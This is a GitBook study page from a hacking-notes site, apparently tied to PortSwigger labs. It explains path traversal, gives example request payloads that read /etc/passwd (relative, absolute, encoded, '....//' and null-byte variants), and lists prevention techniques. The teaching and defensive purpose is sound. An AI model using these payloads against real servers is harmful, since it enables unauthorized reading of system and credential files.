Daemon Of Hacking
  • WELCOME!
    • 👋/home/usr/KruKnight
  • METHODOLOGIES & RESOURCES
    • Passwords & Attacks
    • Post Exploitation
      • 👀Situational Awareness
      • 🖥️Privilege Escalation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
  • Writeups
    • CyCtf 2024
      • Vending Machine
      • Aerospace
      • OhMyCell
    • Portswigger Labs
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
        • Password reset broken logic
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken Brute-Force Protection, IP Block
        • Username enumeration via account lock
        • 2FA broken logic
        • Brute-forcing a stay-logged-in cookie
        • Offline password cracking
        • Password reset poisoning via middleware
        • Password brute-force via password change
        • Broken brute-force protection, multiple credentials per request
      • Os Command Injection
        • OS command injection, simple case
        • Blind OS command injection with time delays
        • Blind OS command injection with output redirection
        • Blind OS command injection with out-of-band interaction
        • Blind OS command injection with out-of-band data exfiltration
      • Cross-Origin Resource Sharing (CORS)
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Server-side template injection
        • Basic server-side template injection
        • Basic server-side template injection (code context)
      • Server-Side Request Forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end
        • Blind SSRF with out-of-band detection
        • SSRF with blacklist-based input filter
        • SSRF with filter bypass via open redirection vulnerability
      • Path Traversal
  • 🟩HTB Writeups
    • Heal
Powered by GitBook
On this page
  • Overview
  • Common Attack Variants
  • Prevention Techniques
  • Summary Examples

Was this helpful?

  1. Writeups
  2. Portswigger Labs

Path Traversal

Overview

Directory Traversal is a web security vulnerability that allows an attacker to gain unauthorized access to files and directories stored outside the intended web root directory. This is often possible when an application uses user-supplied input to construct file paths.

Common Attack Variants

1. Relative Path Traversal

Using ../ sequences to traverse directories upwards from the web root.

GET /loadImage?filename=../../../etc/passwd

2. Absolute Path Traversal

Providing an absolute path directly to a sensitive file.

GET /loadImage?filename=/etc/passwd

3. Traversal from a Known Start Path

If the application validates the file path to begin with a specific base directory (e.g., /var/www/images), attackers may still traverse out of it:

GET /loadImage?filename=/var/www/images/../../../etc/passwd

4. Traversal with Escaped Paths

Using non-standard encodings or path tricks like:

GET /loadImage?filename=....//....//....//etc/passwd
GET /loadImage?filename=....\/....\/....\/etc/passwd

5. Traversal Using URL Encoding

To bypass filters that remove ../, encode them:

  • %2e%2e%2f (for ../)

  • %252e%252e%252f (double encoded)

  • Other variants: ..%c0%af, ..%ef%bc%8f

GET /loadImage?filename=..%252f..%252f..%252fetc/passwd

6. Null Byte Injection

If file extensions are validated (e.g., .png required), a null byte %00 may prematurely terminate the string:

GET /loadImage?filename=../../../etc/passwd%00.png

Prevention Techniques

  1. Disallow User-Controlled File Paths

    • Do not use user input directly in file retrieval logic.

  2. Input Sanitization

    • Strip path traversal sequences (../, ..\, etc.) and URL-encoded forms.

  3. Restrict File Access

    • Limit file access to predefined directories using strict whitelists.

  4. Use File Path Whitelisting

    • Only allow access to known-safe files using a safelist.

  5. Run with Least Privilege

    • Ensure the web server runs with permissions that prevent it from reading sensitive OS files.

  6. Canonicalization Before Validation

    • Normalize file paths before validating them to avoid bypasses via encoding or obfuscation.

Summary Examples

Technique
Example URL

Relative traversal

?filename=../../../etc/passwd

Absolute path

?filename=/etc/passwd

Null byte injection

?filename=../../../etc/passwd%00.png

Encoded traversal

?filename=%2E%2E%2Fetc%2Fpasswd

Known base path with relative traversal

?filename=/var/www/images/../../../etc/passwd

Escaped traversal

?filename=....//....//etc/passwd

PreviousSSRF with filter bypass via open redirection vulnerabilityNextHeal

Last updated 19 days ago

Was this helpful?